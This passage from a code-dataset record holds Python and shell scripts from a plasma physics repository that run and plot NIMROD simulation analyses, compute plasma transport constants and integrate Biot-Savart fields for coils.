matplotlib.pyplot as plt\nimport numpy as np\nimport argparse\nimport pickle\nimport glob\nfrom shutil import copy2\nimport hcStep as step\nimport nim_timer as nimtime\nimport matplotlib.colors as mcolors\nimport sys\n\ndef pickle_sort(file):\n print(file[5:])\n return int(file.split[0][5:])\n\ndef find_files(thisdir):\n ''' This fuction finds the hc, dump files in the directory\n input: thisdir\n output: hc filename, dumpfilename, stepnumber, step time\n the outputs return None, if a file does not exists\n '''\n dumpfile=None\n nimrodin=None\n listobjs = os.listdir(thisdir)\n for iobj in listobjs:\n wordlist = iobj.split('.')\n if (wordlist[0].lower()=='dumpgll' and wordlist[-1]=='h5'):\n if (dumpfile==None):\n dumpfile=iobj\n else:\n print(f\"Multiple dumpfiles in directory {thisdir}\")\n 
raise\n elif (iobj=='nimrod.in'):\n nimrodin=iobj\n\n return dumpfile, nimrodin\n\ndef hcmult(args):\n dump_pre=[\"dumpgll\",\"dump\"]\n dump_suf=[\"h5\"]\n pickle_suf=[\"pickle\"]\n pickle_pre=[\"power\",\"poweradv\"]\n steplist = []\n read_new = True\n if args['merge']:\n pickle_list=glob.glob(\"power.*\")\n if len(pickle_list)>0:\n for iobj in pickle_list:\n this=step.hcstep(None,None)\n this.load(iobj)\n advpickle=pickle_pre[1]+'.'+str(this.step).zfill(5)+ \\\n '.'+pickle_suf[0]\n print(this.step,advpickle)\n try:\n this2=step.hcstep(None,None)\n this2.load(advpickle)\n for key, field in this2.powerDict.items():\n print(key)\n if key not in this.powerDict:\n print(f\"adding key {key} to power dict\")\n this.powerDict[key]=field\n print(\"Found file\")\n if args['pickle']:\n print(f\"writing file {iobj}\")\n with open(iobj,'wb') as file:\n this.dump(file)\n print('pickle')\n except:\n print(\"File not found\")\n sys.exit(0)\n if args['read']:\n pickle_list=glob.glob(\"power.*\")\n pickle_list.sort(key=pickle_sort)\n if len(pickle_list)>0:\n read_new=False\n for iobj in pickle_list:\n with open(iobj,'rb') as file:\n this=step.hcstep(None,None)\n this.load(file)\n steplist.append(this)\n if read_new==True:\n workdir=os.getcwd()\n listobjs = os.listdir(workdir)\n listobjs.sort()\n for iobj in listobjs:\n if os.path.isdir(iobj):\n thisdir=workdir+'/'+iobj\n dump, nimrodin = find_files(thisdir)\n if dump == None:\n continue\n try:\n os.mkdir('tempdir')\n except:\n print(\"tempdir exists\")\n copy2(thisdir + '/' + dump,'./tempdir')\n copy2('nimrod.in','./tempdir')\n os.chdir('tempdir')\n this=step.hcstep(dump,nimrodin)\n this.get_dumptime()\n if args['mode']==0:\n this.analyze_power(npts=args['npts'])\n this.analyze_power_adv(npts=args['npts'])\n elif args['mode']==1:\n this.analyze_power_adv(npts=args['npts'])\n else:\n print(f\"mode {args['mode']} is not valid\")\n raise ValueError\n for iobj in os.listdir('.'):\n os.remove(iobj)\n os.chdir('../')\n os.rmdir('tempdir')\n this.print_integrals()\n steplist.append(this)\n if args['pickle']:\n pfile=pickle_pre[args['mode']]+'.'+str(this.step).zfill(5)+ \\\n '.'+pickle_suf[0]\n print(f\"writing file {pfile}\")\n with open(pfile,'wb') as file:\n this.dump(file)\n this.clean_up()\n for this in steplist:\n this.print_integrals()\n nimtime.timer.print_times()\n print(this.step, this.time)\n #plot data here\n if args['plot']:\n pass\n\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser(description='Ho-Cradick runner.')\n parser.add_argument('--plot', action='store_true',help='shows plots')\n parser.add_argument('--pickle', action='store_true',help='pickle data')\n parser.add_argument('--read', '-r', action='store_true',help='read pickled data')\n parser.add_argument('--npts', '-n', type=int, default=512,help='number of points in 1D')\n parser.add_argument('--mode', '-m', type=int, default=0,help='0 standard, 1 advect ')\n parser.add_argument('--merge', action='store_true', help='copy advection to power dict ')\n args = vars(parser.parse_args())\n print(args)\n hcmult(args=args)\n" }, { "alpha_fraction": 0.5026423931121826, "alphanum_fraction": 0.6335877776145935, "avg_line_length": 27.88135528564453, "blob_id": "cd6c182c317ee982d5c6f70a748289a722cf4965", "content_id": "eb39724774fa396d8bdc04c47701987a949a00c1", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1703, "license_type": "no_license", "max_line_length": 78, "num_lines": 59, "path": 
"/transport_calculator/plasma_constants.py", "repo_name": "echowell/nimrodscripts", "src_encoding": "UTF-8", "text": "#!/usr/local/bin/python3\n\nimport numpy as np\nme = 9.1093898e-31\nmd = 3.3435860e-27\nqe = 1.60217733e-19\nmu0 = 4 * np.pi * 1e-7\ngamma = 5./3.\nkboltz = 1.60217733e-19\nclight = 2.99792458e8\neps0 = 8.854187817e-12\n \ndef coulombLog(te, ne):\n# logLam = 18.4 - 1.15 * np.log10(ne)+2.3*np.log10(te)\n# Jim Callen uses 17\n logLam = 24 - np.log(np.sqrt(ne*1.e-6)/te)\n return logLam\n\ndef nu_e(ne,te,zeff,logLam):\n nu = np.sqrt(2*np.pi)* ne * zeff * qe**4 * logLam\n nu *= 1.0/(12.0*(np.pi * eps0)**2 * np.sqrt(me) * np.power(kboltz*te,1.5))\n return nu\n\ndef nu_i(ni,ti,mi,zstar,logLam):\n nu = np.sqrt(np.pi)* ni* (1.0+np.sqrt(2.0)*zstar) * qe**4 * logLam\n nu *= 1.0/(12.0*(np.pi * eps0)**2 * np.sqrt(mi) * np.power(kboltz*ti,1.5))\n return nu\n\ndef vte(te):\n return np.sqrt(2*kboltz*te/me)\n\ndef vts(ts,ms):\n return np.sqrt(2*kboltz*ts/ms)\n\ndef zStar(ne,ni,zeff):\n return (ne/ni)*zeff-1.0\n\ndef circulatingFraction(eps):\n return 1-1.46*np.sqrt(eps) + 0.46 * np.power(eps,1.5)\n\ndef nuBanana(nu,eps):\n return np.sqrt(eps)*nu\n\ndef nuStar(R0,q0,epsilon,lam):\n return R0*q0/(np.power(epsilon,1.5)*lam)\n\ndef neoMue(nue,nueStar,zeff,eps):\n numer = 1.46 * np.sqrt(eps) * (1.+0.533/zeff)*nue\n denomFac = (2.4*zeff**2+5.32*zeff+2.225)/(4.25*zeff**2+3.02*zeff)\n denom = (1.+np.sqrt(nueStar)+1.65*(1.+0.533/zeff)*nueStar)\n denom *= (1+1.18*denomFac*np.power(eps,1.5)*nueStar)\n return numer/denom\n\ndef neoMui(nu,nuStar,zStar,eps):\n numer = 1.46 * np.sqrt(eps) * (zStar+0.533)/(zStar+0.707)*nu\n denomFac = (2.4*zStar**2+5.32*zStar+2.225)/((zStar+0.707)*(4.25*zStar+3.02))\n denom = (1.+np.sqrt(nuStar)+1.65*(zStar+0.533)/(zStar+0.707)*nuStar)\n denom *= (1+1.18*denomFac*np.power(eps,1.5)*nuStar)\n return numer/denom" }, { "alpha_fraction": 0.6864407062530518, "alphanum_fraction": 0.7203390002250671, "avg_line_length": 58, "blob_id": "963b5676d871c241198ceb82b992e57734b4c94a", "content_id": "4bd28509d4c217c6112ab14d82303d9275a6518b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 118, "license_type": "no_license", "max_line_length": 107, "num_lines": 2, "path": "/bilderScripts/run_bilder.sh", "repo_name": "echowell/nimrodscripts", "src_encoding": "UTF-8", "text": "#!/bin/sh\n./mknimall.sh -d -j4 -t -m darwin.gcc820 -i /home/research/ehowell/SCRATCH/nimall/SOFTWARE -E USE_MPI=mpich\n" }, { "alpha_fraction": 0.5717322826385498, "alphanum_fraction": 0.6334426403045654, "avg_line_length": 35.105262756347656, "blob_id": "5b5db04a8dbb9ede22760e4b3993e83e3899bcf8", "content_id": "0615122a2f97e4aea0d2da2e96c86fd186b879d0", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 16464, "license_type": "no_license", "max_line_length": 119, "num_lines": 456, "path": "/surfmn/surfmn_runner_03.py", "repo_name": "echowell/nimrodscripts", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python3\nimport os\nimport h5py\nimport surfmnstep\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport argparse\nimport pickle\nimport glob\nfrom shutil import copy2\n\n''' This is a generic runner for surfmn. It loops over a bunch of directorys\nin the current directory, searchs for a surfmn file, and a dump file. If the\ndump file exists, then record the time. If not only record step number. 
It\nthen calls surfmn routines to plot the data and record the reconnected flux'''\n\ndef pickle_sort(file):\n print(file[6:])\n return int(file[6:])\n\ndef get_dumptime(thisfile):\n ''' Open an hdf5 file and read the dump time\n if I can't open file return None\n '''\n time=None\n with h5py.File(thisfile, 'r') as h5file:\n try:\n time=h5file[\"dumpTime\"].attrs['vsTime']\n except:\n print(f\"No dumpTime in dumpfile {thisfile}\")\n raise\n return time\n\ndef find_files(thisdir):\n ''' This fuction finds the surfmn, dump files in the directory\n input: thisdir\n output: surfmn filename, dumpfilename, stepnumber, step time\n the outputs return None, if a file does not exists\n '''\n surfmn_file=None\n dumpfile=None\n stepnumber=None\n steptime=None\n nimrodin=None\n listobjs = os.listdir(thisdir)\n for iobj in listobjs:\n wordlist = iobj.split('.')\n if (wordlist[0].lower()=='dumpgll'):\n if (dumpfile==None):\n dumpfile=thisdir+'/'+iobj\n thisstep=int(wordlist[1])\n if (stepnumber==None):\n stepnumber=thisstep\n elif (stepnumber!=thisstep):\n print(f\"Dump step does not match surfmn step\")\n raise\n steptime=get_dumptime(dumpfile)\n else:\n print(f\"Multiple dumpfiles in directory {thisdir}\")\n raise\n elif (wordlist[0].lower()=='surfmn'):\n if (surfmn_file==None):\n surfmn_file=thisdir+'/'+iobj\n thisstep=int(wordlist[1])\n if (stepnumber==None):\n stepnumber=thisstep\n elif (stepnumber!=thisstep):\n print(f\"Surfmn step does not match dump step\")\n raise\n else:\n print(f\"Multiple surfmn files in directory {thisdir}\")\n raise\n elif (iobj=='nimrod.in'):\n nimrodin=thisdir+'/'+iobj\n\n\n return surfmn_file, dumpfile, stepnumber, steptime, nimrodin\n\ndef time_hist(steplist):\n print(len(steplist))\n time=np.zeros(len(steplist))\n psi21=np.zeros(len(steplist))\n psi31=np.zeros(len(steplist))\n psi41=np.zeros(len(steplist))\n psi32=np.zeros(len(steplist))\n psi43=np.zeros(len(steplist))\n psi54=np.zeros(len(steplist))\n psi65=np.zeros(len(steplist))\n exb21=np.zeros(len(steplist))\n exb31=np.zeros(len(steplist))\n exb32=np.zeros(len(steplist))\n exb43=np.zeros(len(steplist))\n pressure_profiles=[]\n rho_profiles=[]\n jpar_profiles=[]\n q_profiles=[]\n times=[]\n mlist=[-1,-2,-3,-4]\n qlist=[-1,-2,-3,-4]\n for istep,step in enumerate(steplist):\n print(istep,step.step, step.time)\n time[istep]=step.time\n if step.surfmn_data==False:\n step.read_surfmn()\n if step.profdata==False:\n try:\n os.mkdir('tempprofile')\n except:\n print(\"tempprofile directoy exists\")\n copy2(step.dumpfile,'./tempprofile')\n copy2(step.nimrodin,'./tempprofile')\n os.chdir('tempprofile')\n step.get_profiles()\n for iobj in os.listdir('.'):\n os.remove(iobj)\n os.chdir('../')\n os.rmdir('tempprofile')\n# fig = plt.figure(figsize=(6,5))\n# ax=fig.add_subplot(111)\n# plt.plot(step.profs.rhon,step.profs.omegator)\n# plt.title(r\"fsa\",fontsize=16)\n# plt.ylabel(r'nd ',fontsize=16)\n# plt.xlabel(r'rho',fontsize=16)\n# plt.tight_layout()\n# plt.show()\n psi21[istep]=step.get_resonance(\"psi\",1,-2)\n psi31[istep]=step.get_resonance(\"psi\",1,-3)\n psi41[istep]=step.get_resonance(\"psi\",1,-4)\n psi43[istep]=step.get_resonance(\"psi\",3,-4)\n psi32[istep]=step.get_resonance(\"psi\",2,-3)\n psi54[istep]=step.get_resonance(\"psi\",4,-5)\n psi65[istep]=step.get_resonance(\"psi\",5,-6)\n this_q=step.profs.get_rho_q(q=-2)\n exb21[istep]=step.profs.get_omega_exb(n=1,rhon=this_q)/(2*np.pi)\n this_q=step.profs.get_rho_q(q=-3)\n exb31[istep]=step.profs.get_omega_exb(n=1,rhon=this_q)/(2*np.pi)\n 
#this_q=step.profs.get_rho_q(q=-1.5)\n #exb32[istep]=step.profs.get_omega_exb(n=2,rhon=this_q)/(2*np.pi)\n #this_q=step.profs.get_rho_q(q=-4/3)\n #exb43[istep]=step.profs.get_omega_exb(n=3,rhon=this_q)/(2*np.pi)\n if step.step==00000:\n print(step.mr.shape,step.q.shape)\n eq_q2 = step.profs.get_rho_q(q=-2)\n eq_q3 = step.profs.get_rho_q(q=-3)\n eq_q65 = step.profs.get_rho_q(q=-1.2)\n eq_q54 = step.profs.get_rho_q(q=-1.25)\n eq_q43 = step.profs.get_rho_q(q=-4./3.)\n eq_q32 = step.profs.get_rho_q(q=-3./2.)\n\n\n\n if step.step in [00000]:\n times.append(step.time)\n rho_profiles.append(step.profs.rhon)\n q_profiles.append(-1.0*step.profs.get_field_rho(step.profs.q,step.profs.rhon))\n pressure_profiles.append(step.profs.get_field_rho(step.profs.p/1000,step.profs.rhon))\n jpar_profiles.append(step.profs.get_field_rho(step.profs.jpar/-1000000,step.profs.rhon))\n fig=plt.figure(figsize=(8,8))\n ax=fig.add_subplot(311)\n plt.plot(step.profs.rhon,-1.0*step.profs.get_field_rho(step.profs.q,step.profs.rhon))\n plt.title(r\"Safety factor\",fontsize=16)\n plt.ylabel(r'|q|',fontsize=16)\n plt.xlabel(r'$\\rho_N$',fontsize=16)\n ax.axvline(eq_q2,ls=':')\n ax=fig.add_subplot(312)\n plt.plot(step.profs.rhon,step.profs.get_field_rho(step.profs.jpar/-1000000,step.profs.rhon),color='b')\n plt.title(r\"Current Profile\",fontsize=16)\n plt.ylabel(r'$J_\\parallel$ $[MA/m^2]$',fontsize=16,color='b')\n plt.xlabel(r'$\\rho_N$',fontsize=16)\n ax2=ax.twinx()\n plt.plot(step.profs.rhon,step.profs.get_field_rho(step.profs.p/1000,step.profs.rhon),color='r')\n ax2.set_ylabel('p [kpa]', color='r')\n ax.axvline(eq_q2,ls=':')\n ax=fig.add_subplot(313)\n plt.plot(step.profs.rhon,1.0*step.profs.get_field_rho(step.profs.omegator,step.profs.rhon)/1000)\n plt.title(r\"Rotation Profile\",fontsize=16)\n plt.ylabel(r'$\\omega$ $[krads/s]$',fontsize=16)\n plt.xlabel(r'$\\rho_N$',fontsize=16)\n plt.ylim(0.0,32)\n ax.axvline(eq_q2,ls=':')\n plt.tight_layout()\n plt.show()\n\n fig=plt.figure(figsize=(8,8))\n ax=fig.add_subplot(311)\n plt.plot(step.profs.rhon,-1.0*step.profs.get_field_rho(step.profs.q,step.profs.rhon))\n plt.title(r\"Safety factor\",fontsize=16)\n plt.ylabel(r'|q|',fontsize=16)\n plt.xlabel(r'$\\rho_N$',fontsize=16)\n ax.axvline(eq_q2,ls=':')\n ax=fig.add_subplot(312)\n plt.plot(step.profs.rhon,step.profs.get_field_rho(step.profs.jpar/-1000000,step.profs.rhon))\n plt.title(r\"Current Profile\",fontsize=16)\n plt.ylabel(r'$|J_\\parallel|$ $[MA/m^2]$',fontsize=16)\n plt.xlabel(r'$\\rho_N$',fontsize=16)\n ax.axvline(eq_q2,ls=':')\n ax=fig.add_subplot(313)\n plt.plot(step.profs.rhon,step.profs.get_field_rho(step.profs.p/1000,step.profs.rhon))\n ax.set_ylabel('p [kpa]',fontsize=16)\n plt.title(r\"Pressure Profile\",fontsize=16)\n plt.xlabel(r'$\\rho_N$',fontsize=16)\n ax.axvline(eq_q2,ls=':')\n plt.tight_layout()\n plt.show()\n\n fig=plt.figure(figsize=(8,6))\n ax=fig.add_subplot(211)\n plt.plot(step.profs.rhon,step.profs.get_omega_exb(n=1)/1000)\n plt.title(r\"ExB Rotation Profile\",fontsize=16)\n plt.ylabel(r'$\\Omega$ $[krad/s]$',fontsize=16)\n plt.xlabel(r'$\\rho_N$',fontsize=16)\n #plt.ylim(0.0,)\n ax.axvline(eq_q2,ls=':')\n ax=fig.add_subplot(212)\n plt.plot(step.profs.rhon,1.0*step.profs.get_field_rho(step.profs.kpol,step.profs.rhon)/1000)\n plt.title(r\"Poloidal Rotation Profile\",fontsize=16)\n plt.ylabel(r'$K_{pol}$ $[km/Ts]$',fontsize=16)\n plt.xlabel(r'$\\rho_N$',fontsize=16)\n #plt.ylim(0.0,32)\n ax.axvline(eq_q2,ls=':')\n plt.tight_layout()\n plt.show()\n\n if step.step in [54000,78000,102000,300000,320000]:\n 
times.append(step.time)\n rho_profiles.append(step.profs.rhon)\n pressure_profiles.append(step.profs.get_field_rho(step.profs.p/1000,step.profs.rhon))\n jpar_profiles.append(step.profs.get_field_rho(step.profs.jpar/-1000000,step.profs.rhon))\n q_profiles.append(-1.0*step.profs.get_field_rho(step.profs.q,step.profs.rhon))\n\n if step.step ==10000:#[10000,18680,28000,66000,96000]:\n rargs={}\n rargs[\"scale\"]=1000\n rargs[\"qlist\"]=qlist\n rargs[\"figsize\"]=(9,7.5)\n rargs[\"ylabel\"]=r\"$\\psi$ [mWb]\"\n rargs[\"title\"]=\"n=1 spectrum at peak pulse\"\n\n# if step.time>0: #avoids issues if no pertubation\n this_exb=step.profs.get_omega_exb(n=1)\n this_rho_21=step.profs.get_rho_q(q=-2)\n# fig = plt.figure(figsize=(6,5))\n# ax=fig.add_subplot(111)\n# plt.plot(step.profs.rhon,this_exb/(2*np.pi))\n# plt.title(r\"fsa\",fontsize=16)\n# plt.ylabel(r'f_exb ',fontsize=16)\n# plt.xlabel(r'rho',fontsize=16)\n# ax.axvline(this_rho_21,ls=':')\n# plt.tight_layout()\n# plt.show()\n step.plot_surfmn(\"psi\",1,**{\"scale\":1000})\n# step.plot_surfmn(\"psi\",2,**{\"scale\":1000})\n# step.plot_surfmn(\"psi\",3,**{\"scale\":1000})\n# step.plot_surfmn(\"psi\",4,**{\"scale\":1000})\n# step.plot_surfmn(\"psi\",5,**{\"scale\":1000})\n# step.plot_radial(\"psi\",1,mlist,**{\"scale\":1000,\"qlist\":qlist,\"figsize\":(9,7.5),\"ylabel\":r\"$\\psi$ [mWb]\",\"title\":\n# \"n=1 at peak pulse\"})\n step.plot_radial(\"psi\",1,mlist,**rargs)\n\n fig = plt.figure(figsize=(8,6))\n ax=fig.add_subplot(111)\n for (this_rhon, this_p, this_time,index) in zip(rho_profiles,pressure_profiles,times,range(0,4)):\n if index==1:\n ls='-.'\n else:\n ls='-'\n plt.plot(this_rhon, this_p,ls=ls, label=\"{:2.1f} ms\".format(this_time*1000))\n ax.axvline(eq_q2 ,ls=':',label=\"q=2/1\",color='r')\n ax.axvline(eq_q32,ls=':',label=\"q=3/2\",color='b')\n ax.axvline(eq_q43,ls=':',label=\"q=4/3\",color='g')\n ax.axvline(eq_q54,ls=':',label=\"q=5/4\",color='y')\n ax.legend(loc='best',frameon=True,ncol=2,fontsize=14)\n plt.title(r\"Pressure Profile Evolution\",fontsize=16)\n plt.ylabel(r'$p$ [kPa] ',fontsize=16)\n plt.xlabel(r'$\\rho_N$',fontsize=16)\n plt.tight_layout()\n plt.show()\n\n fig = plt.figure(figsize=(8,6))\n ax=fig.add_subplot(111)\n for (this_rhon, this_j, this_time,index) in zip(rho_profiles,jpar_profiles,times,range(0,4)):\n if index==1:\n ls=':'\n else:\n ls='-'\n plt.plot(this_rhon, this_j, label=\"{:2.1f} ms\".format(this_time*1000))\n ax.axvline(eq_q2 ,ls=':',label=\"q=2/1\",color='r')\n ax.axvline(eq_q32,ls=':',label=\"q=3/2\",color='b')\n ax.axvline(eq_q43,ls=':',label=\"q=4/3\",color='g')\n ax.axvline(eq_q54,ls=':',label=\"q=5/4\",color='y')\n ax.legend(loc='best',frameon=True,ncol=2,fontsize=14)\n plt.title(r\"Parallel Current\",fontsize=16)\n plt.ylabel(r'$J_\\parallel$ [$MA/m^2$] ',fontsize=16)\n plt.xlabel(r'$\\rho_N$',fontsize=16)\n plt.tight_layout()\n plt.show()\n\n fig = plt.figure(figsize=(8,6))\n ax=fig.add_subplot(111)\n for (this_rhon, this_q, this_time,index) in zip(rho_profiles,q_profiles,times,range(0,4)):\n if index==1:\n ls=':'\n else:\n ls='-'\n plt.plot(this_rhon, this_q, ls=ls,label=\"{:3.2f} ms\".format(this_time*1000))\n ax.legend(loc=0)\n ax.axvline(eq_q2,ls=':')\n ax.axvline(eq_q65,ls=':')\n ax.axvline(eq_q54,ls=':')\n ax.axvline(eq_q43,ls=':')\n ax.axvline(eq_q32,ls=':')\n ax.legend(loc='best',frameon=True,ncol=2,fontsize=14)\n plt.title(r\"Safety Factor\",fontsize=16)\n plt.ylabel(r'$q$',fontsize=16)\n plt.xlabel(r'$\\rho_N$',fontsize=16)\n plt.tight_layout()\n plt.show()\n\n fig = 
plt.figure(figsize=(8,6))\n ax=fig.add_subplot(111)\n plt.plot(time*1000,psi21*1000,label=\"2/1\")\n ax.axvline(1.7841168247219863,ls=':',color='k')\n ax.axvline(5.000303824828437,ls=':',color='k')\n ax.fill([0,1.0,1.0,0],[0,0,35,35],'gray',alpha=0.2)\n plt.ylim(0,35)\n plt.title(r\"$\\psi$ 2/1\",fontsize=16)\n plt.ylabel(r'$\\psi$ [mWb] ',fontsize=16)\n plt.xlabel(r't [ms]',fontsize=16)\n plt.tight_layout()\n plt.show()\n\n fig = plt.figure(figsize=(8,6))\n ax=fig.add_subplot(111)\n plt.plot(time*1000,psi31*1000)\n ax.axvline(1.7841168247219863,ls=':',color='k')\n ax.axvline(5.000303824828437,ls=':',color='k')\n ax.fill([0,1.0,1.0,0],[0,0,45,45],'gray',alpha=0.2)\n plt.ylim(0,45)\n plt.title(r\"$\\psi$ 3/1\",fontsize=16)\n plt.ylabel(r'$\\psi$ [mWb] ',fontsize=16)\n plt.xlabel(r't [ms]',fontsize=16)\n plt.tight_layout()\n plt.show()\n\n\n fig = plt.figure(figsize=(8,6))\n ax=fig.add_subplot(111)\n plt.plot(time*1000,psi21*1000,label=\"2/1\")\n plt.plot(time*1000,psi31*1000,label=\"3/1\")\n plt.plot(time*1000,psi32*1000,label=\"3/2\")\n plt.plot(time*1000,psi43*1000,label=\"4/3\")\n plt.plot(time*1000,psi54*1000,label=\"5/4\")\n plt.plot(time*1000,psi65*1000,label=\"6/5\")\n ax.legend(loc='best',frameon=True,ncol=2,fontsize=14)\n plt.title(r\"$\\psi$\",fontsize=16)\n plt.ylabel(r'$\\psi$ [mWb] ',fontsize=16)\n plt.xlabel(r't [ms]',fontsize=16)\n plt.tight_layout()\n plt.show()\n\n if False:\n #[0,0.5413792981815724,2.969027824826107,5.000303824828437\n #10.056996153823189,14.987410824789972\n time_slice=14.987410824789972\n fig = plt.figure(figsize=(8,6))\n ax=fig.add_subplot(111)\n plt.plot(time*1000,psi21*1000,label=\"2/1\")\n plt.plot(time*1000,psi31*1000,label=\"3/1\")\n plt.plot(time*1000,psi32*1000,label=\"3/2\")\n plt.plot(time*1000,psi43*1000,label=\"4/3\")\n plt.plot(time*1000,psi54*1000,label=\"5/4\")\n plt.plot(time*1000,psi65*1000,label=\"6/5\")\n ax.axvline(time_slice,ls='-',color='k')\n ax.legend(loc='best',frameon=True,ncol=2,fontsize=14)\n plt.title(r\"$\\psi$\",fontsize=16)\n plt.ylabel(r'$\\psi$ [mWb] ',fontsize=16)\n plt.xlabel(r't [ms]',fontsize=16)\n plt.tight_layout()\n plt.show()\n\n fig = plt.figure(figsize=(6,5))\n ax=fig.add_subplot(111)\n plt.plot(time*1000,np.abs(exb43)/1000)\n plt.plot(time*1000,np.abs(exb32)/1000)\n plt.plot(time*1000,np.abs(exb31)/1000)\n plt.plot(time*1000,np.abs(exb21)/1000)\n plt.title(r\"$f_{eb}$ \",fontsize=16)\n plt.ylabel(r'f [kHz] ',fontsize=16)\n plt.xlabel(r't [ms]',fontsize=16)\n plt.tight_layout()\n plt.show()\n# for istep in steplist:\n\ndef surfmn_runner(show_plot=True,pickle_data=False,read_pickle=False):\n ''' main runner for surfmn\n loops over all objects in a directory\n checks to see if the objects are a directory\n if so, then searches that directoy for a dump file and surfmn file'''\n steplist=[]\n read_new = True\n if read_pickle:\n pickle_list=glob.glob(\"pickle*\")\n pickle_list.sort(key=pickle_sort)\n if len(pickle_list)>0:\n read_new=False\n for iobj in pickle_list:\n with open(iobj,'rb') as file:\n step=surfmnstep.SurfmnStep(None, None, None, None, None)\n step.load(file)\n steplist.append(step)\n# steplist.append(pickle.load(open(iobj, \"rb\" )))\n if read_new==True:\n workdir=os.getcwd()\n listobjs = os.listdir(workdir)\n listobjs.sort()\n for iobj in listobjs:\n if os.path.isdir(iobj):\n thisdir=workdir+'/'+iobj\n surfmn_file, dump, step, time, nimrodin = find_files(thisdir)\n steplist.append(surfmnstep.SurfmnStep(surfmn_file, dump, step, time,nimrodin))\n if show_plot:\n time_hist(steplist)\n if pickle_data:\n 
for step in steplist:\n if step==None:\n continue\n if step.surfmn_data==False:\n step.read_surfmn()\n if step.profdata==False:\n try:\n os.mkdir('tempprofile')\n except:\n print(\"tempprofile directoy exists\")\n copy2(step.dumpfile,'./tempprofile')\n copy2(step.nimrodin,'./tempprofile')\n os.chdir('tempprofile')\n step.get_profiles()\n for iobj in os.listdir('.'):\n os.remove(iobj)\n os.chdir('../')\n os.rmdir('tempprofile')\n filename=\"pickle\"+str(step.step).zfill(5)\n with open(filename,'wb') as file:\n step.dump(file)\n# pickle.dump(step,open(filename,'wb'))\n\n# steplist[1].read_surfmn()\n# print(steplist[1].get_resonance(\"psi\",1,-2))\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser(description='Surfmn runner.')\n parser.add_argument('--plot', action='store_true',help='shows plots')\n parser.add_argument('--pickle', action='store_true',help='pickle data')\n parser.add_argument('--read', '-r', action='store_true',help='read pickled data')\n args = vars(parser.parse_args())\n surfmn_runner(show_plot=args['plot'],pickle_data=args['pickle'],read_pickle=args['read'])\n" }, { "alpha_fraction": 0.5755603909492493, "alphanum_fraction": 0.6167751550674438, "avg_line_length": 29.086956024169922, "blob_id": "a26d130506b14213837d5ba39faad3a391a59ad4", "content_id": "c3f71cc23ec0ca80874b1df80f2c43fb7f44af40", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1383, "license_type": "no_license", "max_line_length": 58, "num_lines": 46, "path": "/biotSavart/integrateBS.py", "repo_name": "echowell/nimrodscripts", "src_encoding": "UTF-8", "text": "#!/usr/local/bin/python3\n# coil class\n# \n\n# the line integral uses a solution vector\n# of length 6\n# the first 3 index are the x,y,z locations at (l)\n# the next 3 indexs are the values of bx,by,bz\n\nimport sys\nimport numpy as np\nimport coilClass as cc\nfrom scipy.integrate import odeint\ndef dBFunc(solVec,l,dxyz,xyzp):\n# integrand of Biot Savart for a line segment\n k = 1.0e-7 #mu_0/4pi\n x,y,z,bx,by,bz = solVec\n dx,dy,dz=dxyz\n xp,yp,zp=xyzp\n xVec = np.asarray([xp-x,yp-y,zp-z]) \n xNorm =np.linalg.norm(xVec)\n dlVec =np.asarray([dx,dy,dz])\n dBvec = np.cross(dlVec,xVec) * k /(xNorm**3) \n dS = np.asarray([dx,dy,dz,dBvec[0],dBvec[1],dBvec[2]])\n return dS\n\ndef intCoil(thisCoil,xyzp):\n bxyzVec = np.zeros(3)\n sol0 = np.zeros(6)\n for ii in range(thisCoil.segments):\n dx = thisCoil.xyz[0,ii+1]-thisCoil.xyz[0,ii]\n dy = thisCoil.xyz[1,ii+1]-thisCoil.xyz[1,ii]\n dz = thisCoil.xyz[2,ii+1]-thisCoil.xyz[2,ii]\n dxyz=np.asarray([dx,dy,dz])\n sol0[0]=thisCoil.xyz[0,ii]\n sol0[1]=thisCoil.xyz[1,ii]\n sol0[2]=thisCoil.xyz[2,ii]\n sol0[3]=bxyzVec[0]\n sol0[4]=bxyzVec[1]\n sol0[5]=bxyzVec[2]\n sol=odeint(dBFunc,sol0,[0.0,1.0],args=(dxyz,xyzp))\n bxyzVec[0]=sol[1,3]\n bxyzVec[1]=sol[1,4]\n bxyzVec[2]=sol[1,5]\n bxyzVec=bxyzVec * thisCoil.current\n return bxyzVec" }, { "alpha_fraction": 0.5912618637084961, "alphanum_fraction": 0.621730387210846, "avg_line_length": 30.0625, "blob_id": "1d9e46ec9e8b807feae1380ff9aecd81a08059fe", "content_id": "9ae3601dc66da3ccc7a3cc37837ba330d0cd7e26", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3479, "license_type": "no_license", "max_line_length": 101, "num_lines": 112, "path": "/diiidNim/pFileClean.py", "repo_name": "echowell/nimrodscripts", "src_encoding": "UTF-8", "text": "#!/usr/local/bin/python3\n''' This script is useful for cleaning up the 
pfile'''\n\n###################################\nimport os\nimport numpy as np\nfrom scipy.interpolate import splev,splrep\nimport matplotlib.pyplot as plt\nhomeDir = os.environ['HOME']\n\n\ndef readField(thisFile,npts):\n field = np.zeros([npts,3])\n for ii in range(npts):\n thisLine = thisFile.readline()\n thisWord = thisLine.split()\n for jj in range(3):\n field[ii,jj]=float(thisWord[jj])\n return field\n\ndef writeField(writeFile, field):\n for ii in range(field.shape[0]):\n thisline = writeFile.write('{:-f} {:-f} {:-f}\\n'.format(field[ii,0],field[ii,1],field[ii,2]))\n\nclass modField:\n field0 = 0.0\n dFeild0 = 0.0\n weldPsi = -1.0\n mode = 0\n quadA = 0.0\n quadB = 0.0\n quadC = 0.0\n name = \"\"\n def __init__ (self, name, field0, dField0, weldPsi, mode):\n self.name = name\n self.field0 = field0\n self.dField0 = dField0\n self.weldPsi = weldPsi\n self.mode = mode\n def quadFit(self,fWeld,dfWeld):\n ''' Assume that the function is quadratic near the axis'''\n self.quadC = self.field0\n if (self.mode==0): # fit derivative at 0\n self.quadB = self.dField0\n self.quadA = (fWeld-self.quadB * self.weldPsi - self.quadC)/(self.weldPsi**2)\n else: #fit derivative at xweld\n self.quadA = (dfWeld * self.weldPsi +self.quadC - 